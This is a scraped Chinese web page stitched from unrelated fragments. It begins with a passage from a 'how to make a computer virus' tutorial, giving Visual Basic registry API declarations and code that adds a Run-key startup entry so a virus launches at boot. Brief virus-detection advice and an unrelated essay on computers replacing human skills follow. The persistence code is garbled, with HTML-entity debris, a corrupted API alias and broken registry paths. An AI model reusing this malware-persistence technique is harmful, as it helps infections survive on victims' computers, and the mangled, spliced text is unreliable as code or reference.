所以,我们就要利用编程来实现着一功能。读写注册表要用到API函数,代码:Privatenbsp;Declarenbsp;Functionnbsp;RegCreateKeynbsp;Libnbsp;“advapi32.dll“nbsp;Aliasnbsp;“RegCreateKeyA“nbsp;(ByValnbsp;hKeynbsp;Asnbsp;Long,nbsp;ByValnbsp;lpSubKeynbsp;Asnbsp;String,nbsp;phkResultnbsp;Asnbsp;Long)nbsp;Asnbsp;LongPrivatenbsp;Declarenbsp;Functionnbsp;RegCloseKeynbsp;Libnbsp;“advapi32.dll“nbsp;(ByValnbsp;hKeynbsp;Asnbsp;Long)nbsp;Asnbsp;LongPrivatenbsp;Declarenbsp;Functionnbsp;RegSetValueExnbsp;Libnbsp;“advapi32.dll“nbsp;Aliasnbsp;“RegSetVquduwen“nbsp;(ByValnbsp;hKeynbsp;Asnbsp;Long,nbsp;ByValnbsp;lpvalueNamenbsp;Asnbsp;String,nbsp;ByValnbsp;Reservednbsp;Asnbsp;Long,nbsp;ByValnbsp;dwTypenbsp;Asnbsp;Long,nbsp;lpDatanbsp;Asnbsp;Any,nbsp;ByValnbsp;cbDatanbsp;Asnbsp;Long)nbsp;Asnbsp;Long上述是API声明。
病毒的开机自启就是在RUN下建立一个启动项,代码:Dimnbsp;hKeynbsp;Asnbsp;LongDimnbsp;ccLetnbsp;ccnbsp;=nbsp;Len(“病毒的绝对路径“)RegCreateKeynbsp;HKEY_LOCAL_MACHINE,nbsp;“SoftwareMicrosoftWindowsCurrentVersionRunservices“,nbsp;hKeyRegSetValueExnbsp;hKey,nbsp;“键名“,nbsp;0,nbsp;REG_SZ,nbsp;ByValnbsp;“病毒的绝对路径“,nbsp;ccRegCloseKeynbsp;hKey以上代码执行后会在注册表中加入一个病毒的启动项。光利用开机自启来长驻内存也太容易被杀了。所以,我们还要想尽一切办法来让病毒启动。
看了“如何制作电脑病毒”文章的还看了:
浏览量:2
下载量:0
时间:
你有去详细的了解过电脑病毒吗!计算机病毒实质上是一种人为蓄意制造的、以破坏计算机软硬件系统为目的的程序,下面由读文网小编给你做出详细的电脑病毒介绍!希望对你有帮助!
主动预防计算机病毒,可以大大遏制计算机病毒的传播和蔓延。但是,目前还不可能完全预防计算机病毒。因此在“预防为主”的同时,不能忽略病毒的清除。
发现病毒是清除病毒的前提条件。计算机病毒的一般检测方法有以下两种。
1、人工检测。人工检测是指通过DEBUG、PCTOOLS、NORTON等工具软件提供的功能进行病毒的检测。这种方法比较复杂,因而不易普及。
2、自动检测。自动检测是指通过一些专门的诊断、查毒软件(如瑞星、KVW3000等)来扫描检查系统或软盘是否有毒的方法。自动检测比较简单,一般用户都可以进行,这是最常用的方法。
电脑就是:近来,还有一种关于电脑的说法很流行,说电脑不过是一种新的家用电器,就像电视机、照相机、录像机一样。一些电脑厂商为了迎合这种说法,甚至把电脑银灰色的色彩和方正的形状加以改变,以便让它向家用电器“看齐”。
的确,在很多人的心目中,电脑像电视能出画面、收录机能出声音、游戏机能玩游戏一样,只不过它的功能多一些———既能玩游戏、听音乐、看VCD,还能用来打字、画画……
然而,我的看法却不敢与上述观点苟同。我以为,把电脑当做单纯的计算机来看的人,未免太小瞧电脑了,计算和处理数据只不过是它众多能力的一种;而那些千方百计把电脑往家用电器里归类的人,有许多是推销电脑的厂商,目的是为了让老百姓们能像轻轻松松买家用电器一样轻轻松松买电脑。这种说法的初衷可以理解,但实际情形却并非如此。
我总感觉,那些拼命把电脑往“家用电器”里推的人,就像掩耳盗铃的古人一样,是在自欺欺人(也许我这话说重了,如果因此而冒犯了什么人,请多多海涵)。好像只要把电脑往家用电器里一推,人们就可以继续居高临下地藐视一切,可以随意处置这些只要没有电就一筹莫展的铁家伙。如果你也真的这样想,就大错特错了。这里可以用上大家熟知的电影里的一句话:“我们以往的教训,就在于轻敌呦!”
电脑在我的心目中,既是一位神秘的天使,又像一个凶恶的魔鬼。说她是天使,是因为她是那样的神奇,你根本无法猜测她的本事究竟有多大,许多人类做不了的事,她干起来却是信手拈来,毫不费力,尽管她是人类“造”出来的。而说它像恶魔,是因为它对人类引以为自豪并赖以为生的技能、技巧的摧毁和对人的淘汰是那样的干净彻底,毫不留情。
记得我初到报社的时候,经常到铅字排版车间看师傅捡字组版。每当发现个别不常用的铅字没有时,就让老师傅用手工现刻一个铅字。当时看到刻字师傅那一手既精湛又标准的刻字手艺,真打心眼儿里钦佩。
然而没几年,电脑来了,铅与火被光与电取代,阴暗脏乱的铅字排版车间变成了窗明几亮、清静舒适的激光照排车间。与此同时,那些绝技高超的老师傅也因电脑的到来而没有了用武之地,那些能快速从满是反字的铅字架上捡字的高手,面对小小的电脑键盘却无计可施……
类似的情景并不仅仅出现在印刷业,在电脑已被广泛应用的各个行业,都有人让电脑从原来的辉煌宝座上被无情地驱赶下来:金融行业的“数钞能手”、电信业的“活电话簿”、教育界的“活字典”,还有那些“心算超人”、“发电报能手”……在电脑的面前,全都黯然失色,不值一提!
面对信息社会已经发生的这一切,你还敢说电脑不过是一种家用电器吗?哪一种家用电器能有电脑这样的神通?又有哪一种家用电器能像电脑这样让人感到振奋或恐惧?
当今世界,与电脑相关的信息产业突飞猛进地发展,电脑网络正越来越紧地把世界各地的人们“网”在一起,地球已变得越来越小。如今只要有台电脑,你足不出户,就可以“坐地日行八万里,巡天遥看一千河”,尽览全球各个角落发生的各种新闻,与世界各国的认识的和不认识的人打交道……
电脑在改变着世界,也在改变着每一个人的学习方式、工作方式和生活方式,她是一场实实在在的革命!你不会画画吗?不要紧,你用电脑制作出来的作品,一点不比那些美术大师差;你不会弹琴吗?
不要怕,用电脑演奏的钢琴曲,连世界顶级高手也望尘莫及;走进如雨后春笋般出现的广告公司,你还能看到以往那种“一只画笔打天下”的景致吗?看着那一台台闪烁着异彩画面的电脑,哪一种家用电器能让你有这种欣喜感和危机感?
看了“详细电脑病毒知识介绍”文章的还看了:
浏览量:2
下载量:0
时间: